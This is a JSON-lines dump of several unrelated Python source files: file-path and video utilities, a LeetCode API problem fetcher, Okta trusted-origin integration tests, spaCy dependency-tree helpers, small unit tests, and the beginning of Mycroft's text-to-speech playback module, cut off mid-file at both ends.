.exe with PyInstaller)\\n\n returns : True/False, if the script is an executable\n \"\"\"\n import sys\n return getattr(sys,'frozen',False)\n\ndef script_dir()->str:\n \"\"\"\n Get the path to the current script's directory, whether running as an executable or in an interpreter.\\n\n returns : A string containing the path to the 
script directory.\n \"\"\"\n from os import path\n import sys\n return path.dirname(sys.executable) if is_executable() else os.path.join(path.dirname(path.realpath(sys.argv[0])),'app')\n\ndef local_path(dir_name:str='')->str:\n \"\"\"\n Get the absolute path to a local file/directory __MEIPASS or .), whether running as an executable or in an interpreter.\\n\n returns : A string containing the path to the local file/directory\n \"\"\"\n from os import path\n import sys\n return path.join(sys._MEIPASS, dir_name) if is_executable() else path.join(script_dir(),dir_name)\n\n\ndef convert_size_to_bytes(size_str:str):\n \"\"\"\n Converts a size string (eg: \"12gb\") to bytes.\n \"\"\"\n multipliers={\"kb\":1024,\"mb\":1024000,\"gb\":1024000000,\"tb\":1024000000000} #god help whoever converts a tb file\n expr=Word(nums+','+'.').setParseAction(lambda toks:float(toks[0])).setResultsName('size')+(CaselessLiteral('kb')^ CaselessLiteral('mb') ^ CaselessLiteral('gb') ^ CaselessLiteral('tb')).setParseAction(lambda toks:multipliers[toks[0]]).setResultsName('mult')\n result=None\n try:\n result=expr.parseString(size_str.replace(',',''))\n except ParseException:\n return None\n return result.size*result.mult\n\ndef is_int(s:str):\n \"\"\"\n Return whether or not the str `s` is an int.\n \"\"\"\n try:\n int(s)\n return True\n except ValueError:\n return False\n\n\ndef get_video_info(filename:str,ffprobe:str=os.path.join(local_path('resources'),'ffprobe.exe')):\n \"\"\"\n Get the video info from a video file.\\n\n Returns a JSON object\n \"\"\"\n command = [ffprobe,\n \"-loglevel\", \"quiet\",\n \"-print_format\", \"json\",\n \"-show_format\",\n \"-show_streams\",\n filename\n ]\n pipe = Popen(command, stdout=PIPE, stderr=STDOUT,creationflags = CREATE_NO_WINDOW)\n out, err = pipe.communicate()\n return loads(out)\n\n\ndef get_free_space_b(dirname):\n \"\"\"Return folder/drive free space (in bytes).\"\"\"\n import ctypes\n import os\n import platform\n import sys\n if platform.system() == 'Windows':\n free_bytes = ctypes.c_ulonglong(0)\n ctypes.windll.kernel32.GetDiskFreeSpaceExW(ctypes.c_wchar_p(dirname), None, None, ctypes.pointer(free_bytes))\n return free_bytes.value\n else:\n st = os.statvfs(dirname)\n return st.f_bavail * st.f_frsize\n\n\ndef vid_time_to_ms(time_str:str):\n h,m,s=time_str.split(':')\n s,ms=s.split('.')\n ms=ms.rstrip('0')\n if not ms:ms='0'\n h,m,s,ms=map(float,(h,m,s,ms))\n ms+=(s*1000)\n ms+=(m*60*1000)\n ms+=(h*60*60*1000)\n return ms\n\nclass Custom_Zip():\n \"\"\"Same basic functionality as zip() builtin, but can be used with differently size iterators\n \"\"\"\n def __init__(self,*args,default:Any=None):\n \"\"\"Same as zip() builtin, but returns default from any iters that are exhausted until all are exhausted\n\n Args:\n default (Any, optional): [description]. Defaults to None.\n \"\"\"\n self.args=[iter(c) for c in args]\n self.default=default\n\n def __iter__(self):\n return self\n \n def __next__(self):\n yields=[]\n for arg in self.args:\n yields.append(next(arg,self.default))\n if all(c is None for c in yields):\n raise StopIteration\n return tuple(yields)\n\ndef make_dirs(path:str):\n \"\"\"Make the directory path specified.\n\n Args:\n path (str): The path to create. 
Should either be a file (eg: /foo/bar/baz.txt), or a directory ending in / (/foo/bar/)\n \"\"\"\n if not os.path.exists(os.path.dirname(path)):\n try:\n os.makedirs(os.path.dirname(path))\n except OSError as exc: # Guard against race condition\n if exc.errno != errno.EEXIST:\n raise\n\ndef normalize_extension(ext:str,dot=True):\n if dot: return '.'+ext.lstrip('.')\n else: return ext.lstrip('.')\n\nclass file_str(str):\n \"\"\"Empty subclass of str builtin, for use with type requiring\n \"\"\"\n pass\n\ndef list_get (l:list, idx:int, default:Any=None):\n try:\n return l[idx]\n except IndexError:\n return default"} {"ext": "py", "sha": "1a2f2cb89e3306bc20b285de6f72ed3bd652f1c1", "content": "import functools\nimport json\nimport logging\nimport math\nimport os\nimport time\nfrom functools import cached_property\nfrom typing import Callable, Dict, List, Tuple, Type\n\n# https://github.com/prius/python-leetcode\nimport leetcode.api.default_api # type: ignore\nimport leetcode.api_client # type: ignore\nimport leetcode.auth # type: ignore\nimport leetcode.configuration # type: ignore\nimport leetcode.models.graphql_query # type: ignore\nimport leetcode.models.graphql_query_get_question_detail_variables # type: ignore\nimport leetcode.models.graphql_query_problemset_question_list_variables # type: ignore\nimport leetcode.models.graphql_query_problemset_question_list_variables_filter_input # type: ignore\nimport leetcode.models.graphql_question_detail # type: ignore\nimport urllib3 # type: ignore\nfrom tqdm import tqdm # type: ignore\n\nCACHE_DIR = \"cache\"\n\n\ndef _get_leetcode_api_client() -> leetcode.api.default_api.DefaultApi:\n \"\"\"\n Leetcode API instance constructor.\n\n This is a singleton, because we don't need to create a separate client\n each time\n \"\"\"\n\n configuration = leetcode.configuration.Configuration()\n\n session_id = os.environ[\"LEETCODE_SESSION_ID\"]\n csrf_token = leetcode.auth.get_csrf_cookie(session_id)\n\n configuration.api_key[\"x-csrftoken\"] = csrf_token\n configuration.api_key[\"csrftoken\"] = csrf_token\n configuration.api_key[\"LEETCODE_SESSION\"] = session_id\n configuration.api_key[\"Referer\"] = \"https://leetcode.com\"\n configuration.debug = False\n api_instance = leetcode.api.default_api.DefaultApi(\n leetcode.api_client.ApiClient(configuration)\n )\n\n return api_instance\n\n\ndef retry(times: int, exceptions: Tuple[Type[Exception]], delay: float) -> Callable:\n \"\"\"\n Retry Decorator\n Retries the wrapped function/method `times` times if the exceptions listed\n in `exceptions` are thrown\n \"\"\"\n\n def decorator(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n for attempt in range(times - 1):\n try:\n return func(*args, **kwargs)\n except exceptions:\n logging.exception(\n \"Exception occured, try %s/%s\", attempt + 1, times\n )\n time.sleep(delay)\n\n logging.error(\"Last try\")\n return func(*args, **kwargs)\n\n return wrapper\n\n return decorator\n\n\nclass LeetcodeData:\n \"\"\"\n Retrieves and caches the data for problems, acquired from the leetcode API.\n\n This data can be later accessed using provided methods with corresponding\n names.\n \"\"\"\n\n def __init__(self, start: int, stop: int) -> None:\n \"\"\"\n Initialize leetcode API and disk cache for API responses\n \"\"\"\n if start < 0:\n raise ValueError(f\"Start must be non-negative: {start}\")\n\n if stop < 0:\n raise ValueError(f\"Stop must be non-negative: {start}\")\n\n if start > stop:\n raise ValueError(f\"Start (){start}) must be not greater than stop 
({stop})\")\n\n self._start = start\n self._stop = stop\n\n @cached_property\n def _api_instance(self) -> leetcode.api.default_api.DefaultApi:\n return _get_leetcode_api_client()\n\n @cached_property\n def _cache(\n self,\n ) -> Dict[str, leetcode.models.graphql_question_detail.GraphqlQuestionDetail]:\n \"\"\"\n Cached method to return dict (problem_slug -> question details)\n \"\"\"\n problems = self._get_problems_data()\n return {problem.title_slug: problem for problem in problems}\n\n @retry(times=3, exceptions=(urllib3.exceptions.ProtocolError,), delay=5)\n def _get_problems_count(self) -> int:\n api_instance = self._api_instance\n\n graphql_request = leetcode.models.graphql_query.GraphqlQuery(\n query=\"\"\"\n query problemsetQuestionList($categorySlug: String, $limit: Int, $skip: Int, $filters: QuestionListFilterInput) {\n problemsetQuestionList: questionList(\n categorySlug: $categorySlug\n limit: $limit\n skip: $skip\n filters: $filters\n ) {\n totalNum\n }\n }\n \"\"\",\n variables=leetcode.models.graphql_query_problemset_question_list_variables.GraphqlQueryProblemsetQuestionListVariables(\n category_slug=\"\",\n limit=1,\n skip=0,\n filters=leetcode.models.graphql_query_problemset_question_list_variables_filter_input.GraphqlQueryProblemsetQuestionListVariablesFilterInput(\n tags=[],\n # difficulty=\"MEDIUM\",\n # status=\"NOT_STARTED\",\n # list_id=\"7p5x763\", # Top Amazon Questions\n # premium_only=False,\n ),\n ),\n operation_name=\"problemsetQuestionList\",\n )\n\n time.sleep(2) # Leetcode has a rate limiter\n data = api_instance.graphql_post(body=graphql_request).data\n\n return data.problemset_question_list.total_num or 0\n\n @retry(times=3, exceptions=(urllib3.exceptions.ProtocolError,), delay=5)\n def _get_problems_data_page(\n self, offset: int, page_size: int, page: int\n ) -> List[leetcode.models.graphql_question_detail.GraphqlQuestionDetail]:\n api_instance = self._api_instance\n graphql_request = leetcode.models.graphql_query.GraphqlQuery(\n query=\"\"\"\n query problemsetQuestionList($categorySlug: String, $limit: Int, $skip: Int, $filters: QuestionListFilterInput) {\n problemsetQuestionList: questionList(\n categorySlug: $categorySlug\n limit: $limit\n skip: $skip\n filters: $filters\n ) {\n questions: data {\n questionFrontendId\n title\n titleSlug\n categoryTitle\n freqBar\n content\n isPaidOnly\n difficulty\n likes\n dislikes\n topicTags {\n name\n slug\n }\n stats\n hints\n }\n }\n }\n \"\"\",\n variables=leetcode.models.graphql_query_problemset_question_list_variables.GraphqlQueryProblemsetQuestionListVariables(\n category_slug=\"\",\n limit=page_size,\n skip=offset + page * page_size,\n filters=leetcode.models.graphql_query_problemset_question_list_variables_filter_input.GraphqlQueryProblemsetQuestionListVariablesFilterInput(),\n ),\n operation_name=\"problemsetQuestionList\",\n )\n\n time.sleep(2) # Leetcode has a rate limiter\n data = api_instance.graphql_post(\n body=graphql_request\n ).data.problemset_question_list.questions\n\n return data\n\n def _get_problems_data(\n self,\n ) -> List[leetcode.models.graphql_question_detail.GraphqlQuestionDetail]:\n problem_count = self._get_problems_count()\n\n if self._start > problem_count:\n raise ValueError(\n \"Start ({self._start}) is greater than problems count ({problem_count})\"\n )\n\n start = self._start\n stop = min(self._stop, problem_count)\n\n page_size = min(3000, stop - start + 1)\n\n problems: List[\n leetcode.models.graphql_question_detail.GraphqlQuestionDetail\n ] = []\n\n logging.info(f\"Fetching 
{stop - start + 1} problems {page_size} per page\")\n\n for page in tqdm(\n range(math.ceil((stop - start + 1) / page_size)),\n unit=\"problem\",\n unit_scale=page_size,\n ):\n data = self._get_problems_data_page(start, page_size, page)\n problems.extend(data)\n\n return problems\n\n async def all_problems_handles(self) -> List[str]:\n \"\"\"\n Get all problem handles known.\n\n Example: [\"two-sum\", \"three-sum\"]\n \"\"\"\n return list(self._cache.keys())\n\n def _get_problem_data(\n self, problem_slug: str\n ) -> leetcode.models.graphql_question_detail.GraphqlQuestionDetail:\n \"\"\"\n TODO: Legacy method. Needed in the old architecture. Can be replaced\n with direct cache calls later.\n \"\"\"\n cache = self._cache\n if problem_slug in cache:\n return cache[problem_slug]\n\n async def _get_description(self, problem_slug: str) -> str:\n \"\"\"\n Problem description\n \"\"\"\n data = self._get_problem_data(problem_slug)\n return data.content or \"No content\"\n\n async def _stats(self, problem_slug: str) -> Dict[str, str]:\n \"\"\"\n Various stats about problem. Such as number of accepted solutions, etc.\n \"\"\"\n data = self._get_problem_data(problem_slug)\n return json.loads(data.stats)\n\n async def submissions_total(self, problem_slug: str) -> int:\n \"\"\"\n Total number of submissions of the problem\n \"\"\"\n return int((await self._stats(problem_slug))[\"totalSubmissionRaw\"])\n\n async def submissions_accepted(self, problem_slug: str) -> int:\n \"\"\"\n Number of accepted submissions of the problem\n \"\"\"\n return int((await self._stats(problem_slug))[\"totalAcceptedRaw\"])\n\n async def description(self, problem_slug: str) -> str:\n \"\"\"\n Problem description\n \"\"\"\n return await self._get_description(problem_slug)\n\n async def difficulty(self, problem_slug: str) -> str:\n \"\"\"\n Problem difficulty. 
Returns colored HTML version, so it can be used\n directly in Anki\n \"\"\"\n data = self._get_problem_data(problem_slug)\n diff = data.difficulty\n\n if diff == \"Easy\":\n return \"Easy\"\n\n if diff == \"Medium\":\n return \"Medium\"\n\n if diff == \"Hard\":\n return \"Hard\"\n\n raise ValueError(f\"Incorrect difficulty: {diff}\")\n\n async def paid(self, problem_slug: str) -> str:\n \"\"\"\n Problem's \"available for paid subsribers\" status\n \"\"\"\n data = self._get_problem_data(problem_slug)\n return data.is_paid_only\n\n async def problem_id(self, problem_slug: str) -> str:\n \"\"\"\n Numerical id of the problem\n \"\"\"\n data = self._get_problem_data(problem_slug)\n return data.question_frontend_id\n\n async def likes(self, problem_slug: str) -> int:\n \"\"\"\n Number of likes for the problem\n \"\"\"\n data = self._get_problem_data(problem_slug)\n likes = data.likes\n\n if not isinstance(likes, int):\n raise ValueError(f\"Likes should be int: {likes}\")\n\n return likes\n\n async def dislikes(self, problem_slug: str) -> int:\n \"\"\"\n Number of dislikes for the problem\n \"\"\"\n data = self._get_problem_data(problem_slug)\n dislikes = data.dislikes\n\n if not isinstance(dislikes, int):\n raise ValueError(f\"Dislikes should be int: {dislikes}\")\n\n return dislikes\n\n async def tags(self, problem_slug: str) -> List[str]:\n \"\"\"\n List of the tags for this problem (string slugs)\n \"\"\"\n data = self._get_problem_data(problem_slug)\n return list(map(lambda x: x.slug, data.topic_tags))\n\n async def freq_bar(self, problem_slug: str) -> float:\n \"\"\"\n Returns percentage for frequency bar\n \"\"\"\n data = self._get_problem_data(problem_slug)\n return data.freq_bar or 0\n\n async def title(self, problem_slug: str) -> float:\n \"\"\"\n Returns problem title\n \"\"\"\n data = self._get_problem_data(problem_slug)\n return data.title\n\n async def category(self, problem_slug: str) -> float:\n \"\"\"\n Returns problem category title\n \"\"\"\n data = self._get_problem_data(problem_slug)\n return data.category_title\n"} {"ext": "py", "sha": "1a2f2cfb3c68197b9fa17b3a971cc500b4db60d7", "content": "from unittest import TestCase\n\nfrom core_get.cli.parse.options_parsers.login_options_parser import LoginOptionsParser\nfrom test.cli.parse.options_parsers.options_parser_test_helper import do_test_parse\n\n\nclass TestLoginOptionsParser(TestCase):\n def test_parses_access_token_correctly(self):\n login_options = do_test_parse(LoginOptionsParser, 'abc123')\n self.assertEqual('abc123', login_options.access_token)\n\n def test_fails_with_no_access_token(self):\n with self.assertRaises(SystemExit):\n do_test_parse(LoginOptionsParser)\n"} {"ext": "py", "sha": "1a2f2e10a41167a2443b155206a8a8b98bdeb8c0", "content": "import pytest\nimport saltext.credstash.sdbs.credstash as credstash_sdb\n\n\n@pytest.fixture\ndef configure_loader_modules():\n module_globals = {\n \"__salt__\": {\"this_does_not_exist.please_replace_it\": lambda: True},\n }\n return {\n credstash_sdb: module_globals,\n }\n\n\ndef test_replace_this_this_with_something_meaningful():\n assert \"this_does_not_exist.please_replace_it\" in credstash_sdb.__salt__\n assert credstash_sdb.__salt__[\"this_does_not_exist.please_replace_it\"]() is True\n"} {"ext": "py", "sha": "1a2f2e80c1717f84fc8c387bdf21036ed14f254e", "content": "import itertools\nimport networkx as nx\nfrom spacy.tokens import Token\n\n\ndef syntactic_depth(token):\n '''Finds token depth in the syntactic tree'''\n\n if token._._syntactic_depth is None:\n depth = 0\n 
current_word = token\n while not current_word == current_word.head:\n depth += 1\n current_word = current_word.head\n token._._syntactic_depth = depth\n return token._._syntactic_depth\n\nToken.set_extension('_syntactic_depth', default=None, force=True)\nToken.set_extension('syntactic_depth', getter=syntactic_depth, force=True)\n\ndef filter_by_depth(depths, tokens):\n if isinstance(depths, int):\n depths = set([depths])\n return [t for t in tokens if t._.syntactic_depth in depths]\n\n\ndef shallowest_token(tokens):\n tokens = sort_by_depth(tokens)\n return tokens[0]\n\n\ndef sort_by_depth(tokens):\n return sorted(tokens, key=lambda w: (w._.syntactic_depth, w.i))\n\n\ndef sort_by_idx(tokens):\n return sorted(tokens, key=lambda w: w.i)\n\n\ndef siblings(token, side=None):\n try:\n siblings = token.head.children\n except:\n return []\n if side == 'left':\n siblings = [s for s in siblings if s.i < token.i]\n elif side == 'left':\n siblings = [s for s in siblings if s.i > token.i]\n return siblings\n\n\ndef doc_to_nx_graph(doc):\n edges = []\n for token in doc:\n for child in token.children:\n edges.append(('{0}-{1}'.format(token.text, token.i),\n '{0}-{1}'.format(child.text, child.i)))\n graph = nx.Graph(edges)\n return graph\n\n\ndef shortest_dependency_path(nx_graph, doc, source, target):\n source = '{0}-{1}'.format(source.text, source.i)\n target = '{0}-{1}'.format(target.text, target.i)\n try:\n path = nx.shortest_path(nx_graph, source=source, target=target)\n except nx.exception.NetworkXNoPath:\n path = []\n dep_path = []\n for node in path:\n idx = int(node.split('-')[-1])\n token = doc[idx]\n dep_path.append(token)\n dep_path = sorted(dep_path, key=lambda t: t._.syntactic_depth)\n return dep_path\n\n\ndef smallest_connected_subgraph(with_tokens, doc, nx_graph=None):\n # Find root nodes\n if not nx_graph:\n nx_graph = doc_to_nx_graph(doc)\n min_depth = min([t._.syntactic_depth for t in with_tokens])\n roots = [t for t in with_tokens if t._.syntactic_depth == min_depth]\n non_roots = [t for t in with_tokens if t not in roots]\n tokens_touched = roots + non_roots\n # For each non-root token, trace paths to each root. 
This will touch every non-root token we're looking for\n for token in non_roots:\n for root in roots:\n path = shortest_dependency_path(nx_graph, doc, token, root)\n for t in path:\n if t not in tokens_touched:\n tokens_touched.append(t)\n tokens_touched = sorted(tokens_touched, key=lambda t: t.i)\n # Trace paths between roots\n for root_x, root_y in itertools.combinations(roots, 2):\n path = shortest_dependency_path(nx_graph, doc, root_x, root_y)\n for t in path:\n if t not in tokens_touched:\n tokens_touched.append(t)\n return tokens_touched\n\n\ndef idxs_to_tokens(doc, idxs):\n return [doc[idx] for idx in idxs]\n\n\ndef token_idxs(tokens):\n return [t.i for t in tokens]\n\n\ndef de_duplicate_list(list_):\n unique_list = []\n for item in list_:\n if item not in unique_list:\n unique_list.append(item)\n return unique_list\n\n\ndef list_contains_duplicates(list_):\n unique_list = de_duplicate_list(list_)\n if len(list_) > len(unique_list):\n return True\n return False\n\n\ndef features_are_in_pattern(features, pattern):\n for pattern_element in pattern:\n for feature in features:\n if feature not in pattern_element['PATTERN']:\n return False\n return True\n\n\ndef flatten_list(list_):\n return list(itertools.chain(*list_))\n"} {"ext": "py", "sha": "1a2f2ee6eadc803b23db8246082ac439cb839c0c", "content": "import pytest\nfrom tests.mocks import MockOktaClient\nimport okta.models as models\nfrom http import HTTPStatus\nfrom okta.errors.okta_api_error import OktaAPIError\n\n\nclass TestTrustedOriginsResource:\n \"\"\"\n Integration Tests for the Trusted Origins Resource\n \"\"\"\n SDK_PREFIX = \"python_sdk\"\n\n @pytest.mark.vcr()\n @pytest.mark.asyncio\n async def test_create_get_origin(self, fs):\n # Instantiate Mock Client\n client = MockOktaClient(fs)\n\n # Create Trusted Origin\n TO_NAME = f\"{TestTrustedOriginsResource.SDK_PREFIX}_test_TO\"\n TO_ORIGIN = \"http://example.com\"\n trusted_origin_model = models.TrustedOrigin({\n \"name\": TO_NAME,\n \"origin\": TO_ORIGIN,\n \"scopes\": [\n models.Scope({\n \"type\": models.ScopeType.CORS\n }),\n models.Scope({\n \"type\": models.ScopeType.REDIRECT\n }),\n ]\n })\n\n created_trusted_origin, _, err = await \\\n client.create_origin(trusted_origin_model)\n assert err is None\n assert isinstance(created_trusted_origin, models.TrustedOrigin)\n\n # Retrieve\n retrieved_origin, _, err = await \\\n client.get_origin(created_trusted_origin.id)\n assert err is None\n assert isinstance(retrieved_origin, models.TrustedOrigin)\n assert retrieved_origin.name == created_trusted_origin.name\n assert len(retrieved_origin.scopes) == 2\n\n # Delete\n _, err = await client.delete_origin(created_trusted_origin.id)\n\n @pytest.mark.vcr()\n @pytest.mark.asyncio\n async def test_list_origins(self, fs):\n # Instantiate Mock Client\n client = MockOktaClient(fs)\n\n # Create Trusted Origin\n TO_NAME = f\"{TestTrustedOriginsResource.SDK_PREFIX}_test_TO\"\n TO_ORIGIN = \"http://example.com\"\n trusted_origin_model = models.TrustedOrigin({\n \"name\": TO_NAME,\n \"origin\": TO_ORIGIN,\n \"scopes\": [\n models.Scope({\n \"type\": models.ScopeType.CORS\n }),\n models.Scope({\n \"type\": models.ScopeType.REDIRECT\n }),\n ]\n })\n\n created_trusted_origin, _, err = await \\\n client.create_origin(trusted_origin_model)\n assert err is None\n assert isinstance(created_trusted_origin, models.TrustedOrigin)\n\n # List\n trusted_origins, _, err = await client.list_origins()\n assert err is None\n assert isinstance(trusted_origins, list)\n assert len(trusted_origins) > 0\n assert 
isinstance(trusted_origins[0], models.TrustedOrigin)\n assert next((to for to in trusted_origins\n if to.name == created_trusted_origin.name), None) \\\n is not None\n\n # Delete\n _, err = await client.delete_origin(created_trusted_origin.id)\n\n @pytest.mark.vcr()\n @pytest.mark.asyncio\n async def test_delete_origin(self, fs):\n # Instantiate Mock Client\n client = MockOktaClient(fs)\n\n # Create Trusted Origin\n TO_NAME = f\"{TestTrustedOriginsResource.SDK_PREFIX}_test_TO\"\n TO_ORIGIN = \"http://example.com\"\n trusted_origin_model = models.TrustedOrigin({\n \"name\": TO_NAME,\n \"origin\": TO_ORIGIN,\n \"scopes\": [\n models.Scope({\n \"type\": models.ScopeType.CORS\n }),\n models.Scope({\n \"type\": models.ScopeType.REDIRECT\n }),\n ]\n })\n\n created_trusted_origin, _, err = await \\\n client.create_origin(trusted_origin_model)\n assert err is None\n assert isinstance(created_trusted_origin, models.TrustedOrigin)\n\n # Retrieve\n retrieved_origin, _, err = await \\\n client.get_origin(created_trusted_origin.id)\n assert err is None\n assert isinstance(retrieved_origin, models.TrustedOrigin)\n assert retrieved_origin.name == created_trusted_origin.name\n assert len(retrieved_origin.scopes) == 2\n\n # Delete\n _, err = await client.delete_origin(created_trusted_origin.id)\n\n # Retrieve to validate\n retrieved_origin, resp, err = await \\\n client.get_origin(created_trusted_origin.id)\n assert err is not None\n assert isinstance(err, OktaAPIError)\n assert resp.get_status() == HTTPStatus.NOT_FOUND\n assert retrieved_origin is None\n\n @pytest.mark.vcr()\n @pytest.mark.asyncio\n async def test_update_origin(self, fs):\n # Instantiate Mock Client\n client = MockOktaClient(fs)\n\n # Create Trusted Origin\n TO_NAME = f\"{TestTrustedOriginsResource.SDK_PREFIX}_test_TO\"\n TO_ORIGIN = \"http://example.com\"\n trusted_origin_model = models.TrustedOrigin({\n \"name\": TO_NAME,\n \"origin\": TO_ORIGIN,\n \"scopes\": [\n models.Scope({\n \"type\": models.ScopeType.CORS\n }),\n models.Scope({\n \"type\": models.ScopeType.REDIRECT\n }),\n ]\n })\n\n created_trusted_origin, _, err = await \\\n client.create_origin(trusted_origin_model)\n assert err is None\n assert isinstance(created_trusted_origin, models.TrustedOrigin)\n\n # Retrieve\n retrieved_origin, _, err = await \\\n client.get_origin(created_trusted_origin.id)\n assert err is None\n assert isinstance(retrieved_origin, models.TrustedOrigin)\n assert retrieved_origin.name == created_trusted_origin.name\n assert len(retrieved_origin.scopes) == 2\n\n # Update\n updated_trusted_origin_model = models.TrustedOrigin({\n \"name\": TO_NAME + \"_updated\",\n \"origin\": TO_ORIGIN,\n \"scopes\": [\n models.Scope({\n \"type\": models.ScopeType.CORS\n }),\n models.Scope({\n \"type\": models.ScopeType.REDIRECT\n }),\n ]\n })\n updated_origin, _, err = await \\\n client.update_origin(created_trusted_origin.id,\n updated_trusted_origin_model)\n assert err is None\n assert isinstance(updated_origin, models.TrustedOrigin)\n assert updated_origin.id == created_trusted_origin.id\n assert updated_origin.name == updated_trusted_origin_model.name\n\n # Retrieve to validate\n retrieved_origin, resp, err = await \\\n client.get_origin(created_trusted_origin.id)\n assert retrieved_origin.id == created_trusted_origin.id\n assert retrieved_origin.name == updated_origin.name\n\n # Delete\n _, err = await client.delete_origin(created_trusted_origin.id)\n\n @pytest.mark.vcr()\n @pytest.mark.asyncio\n async def test_activate_deactivate_origin(self, fs):\n # Instantiate 
Mock Client\n client = MockOktaClient(fs)\n\n # Create Trusted Origin\n TO_NAME = f\"{TestTrustedOriginsResource.SDK_PREFIX}_test_TO\"\n TO_ORIGIN = \"http://example.com\"\n trusted_origin_model = models.TrustedOrigin({\n \"name\": TO_NAME,\n \"origin\": TO_ORIGIN,\n \"scopes\": [\n models.Scope({\n \"type\": models.ScopeType.CORS\n }),\n models.Scope({\n \"type\": models.ScopeType.REDIRECT\n }),\n ]\n })\n\n created_trusted_origin, _, err = await \\\n client.create_origin(trusted_origin_model)\n assert err is None\n assert isinstance(created_trusted_origin, models.TrustedOrigin)\n assert created_trusted_origin.status == \"ACTIVE\"\n\n # Deactivate\n deactivated_origin, _, err = await \\\n client.deactivate_origin(created_trusted_origin.id)\n assert err is None\n assert deactivated_origin.status == \"INACTIVE\"\n\n # Retrieve to validate\n retrieved_origin, resp, err = await \\\n client.get_origin(created_trusted_origin.id)\n assert retrieved_origin.id == created_trusted_origin.id\n assert retrieved_origin.status == \"INACTIVE\"\n\n # Reactivate\n reactivated_origin, _, err = await \\\n client.activate_origin(created_trusted_origin.id)\n assert err is None\n assert reactivated_origin.status == \"ACTIVE\"\n\n # Retrieve to validate\n retrieved_origin, resp, err = await \\\n client.get_origin(created_trusted_origin.id)\n assert retrieved_origin.id == created_trusted_origin.id\n assert retrieved_origin.status == \"ACTIVE\"\n\n # Delete\n _, err = await client.delete_origin(created_trusted_origin.id)\n"} {"ext": "py", "sha": "1a2f2ffdd7ac9f733b0540a9041999b6fa7df820", "content": "#unit test script to test sum module under my_sum\n\nimport sys\n\nsys.path.append('/home/user/workarea/projects/learn-pyspark/jobs/samples/')\n\nimport unittest\nimport pytest\n\nfrom calc import basic\n\ndef test_func():\n assert basic.func(5)==6\n"} {"ext": "py", "sha": "1a2f30ad308da16cdbd261bb36d4ed8b0d26b32d", "content": "# Copyright 2017 Mycroft AI Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport hashlib\nimport os\nimport random\nimport re\nimport sys\nfrom abc import ABCMeta, abstractmethod\nfrom threading import Thread\nfrom time import time, sleep\n\nimport os.path\nfrom os.path import dirname, exists, isdir, join\n\nimport mycroft.util\nfrom mycroft.client.enclosure.api import EnclosureAPI\nfrom mycroft.configuration import Configuration\nfrom mycroft.messagebus.message import Message\nfrom mycroft.metrics import report_timing, Stopwatch\nfrom mycroft.util import (\n play_wav, play_mp3, check_for_signal, create_signal, resolve_resource_file\n)\nfrom mycroft.util.log import LOG\nfrom queue import Queue, Empty\n\n\ndef send_playback_metric(stopwatch, ident):\n \"\"\"\n Send playback metrics in a background thread\n \"\"\"\n\n def do_send(stopwatch, ident):\n report_timing(ident, 'speech_playback', stopwatch)\n\n t = Thread(target=do_send, args=(stopwatch, ident))\n t.daemon = True\n t.start()\n\n\nclass PlaybackThread(Thread):\n \"\"\"\n Thread class for playing back tts audio and sending\n 
visime data to enclosure.\n \"\"\"\n\n def __init__(self, queue):\n super(PlaybackThread, self).__init__()\n self.queue = queue\n self._terminated = False\n self._processing_queue = False\n self._clear_visimes = False\n\n def init(self, tts):\n self.tts = tts\n\n def clear_queue(self):\n \"\"\"\n Remove all pending playbacks.\n \"\"\"\n while not self.queue.empty():\n self.queue.get()\n try:\n self.p.terminate()\n except:\n pass\n\n def run(self):\n \"\"\"\n Thread main loop. get audio and visime data from queue\n and play.\n \"\"\"\n while not self._terminated:\n try:\n snd_type, data, visimes, ident = self.queue.get(timeout=2)\n self.blink(0.5)\n if not self._processing_queue:\n self._processing_queue = True\n self.tts.begin_audio()\n\n stopwatch = Stopwatch()\n with stopwatch:\n if snd_type == 'wav':\n self.p = play_wav(data)\n elif snd_type == 'mp3':\n self.p = play_mp3(data)\n\n if visimes:\n if self.show_visimes(visimes):\n self.clear_queue()\n else:\n self.p.communicate()\n self.p.wait()\n send_playback_metric(stopwatch, ident)\n\n if self.queue.empty():\n self.tts.end_audio()\n self._processing_queue = False\n self.blink(0.2)\n except Empty:\n pass\n except Exception as e:\n LOG.exception(e)\n if self._processing_queue:\n self.tts.end_audio()\n self._processing_queue = False\n\n def show_visimes(self, pairs):\n \"\"\"\n Send visime data to enclosure\n\n Args:\n pairs(list): Visime and timing pair\n\n Returns:\n True if button has been pressed.\n \"\"\"\n start = time()\n for code, duration in pairs:\n if self._clear_visimes:\n self._clear_visimes = False\n return True\n if self.enclosure:\n # Include time stamp to assist with animation timing\n self.enclosure.mouth_viseme(code, start + duration)\n delta = time() - start\n if delta < duration:\n sleep(duration - delta)\n return False\n\n def clear_visimes(self):\n self._clear_visimes = True\n\n def blink(self, rate=1.0):\n \"\"\" Blink mycroft's eyes \"\"\"\n if self.enclosure and random.random() < rate:\n self.enclosure.eyes_blink(\"b\")\n\n def stop(self):\n \"\"\" Stop thread \"\"\"\n self._terminated = True\n self.clear_queue()\n\n\nclass TTS(object):\n \"\"\"\n TTS abstract class to be implemented by all TTS engines.\n\n It aggregates the minimum required parameters and exposes\n ``execute(sentence)`` and ``validate_ssml(sentence)`` functions.\n\n Args:\n lang (str):\n config (dict): Configuration for this specific tts engine\n validator (TTSValidator): Used to verify proper installation\n phonetic_spelling (bool): Whether to spell certain words phonetically\n ssml_tags (list): Supported ssml properties. Ex. 
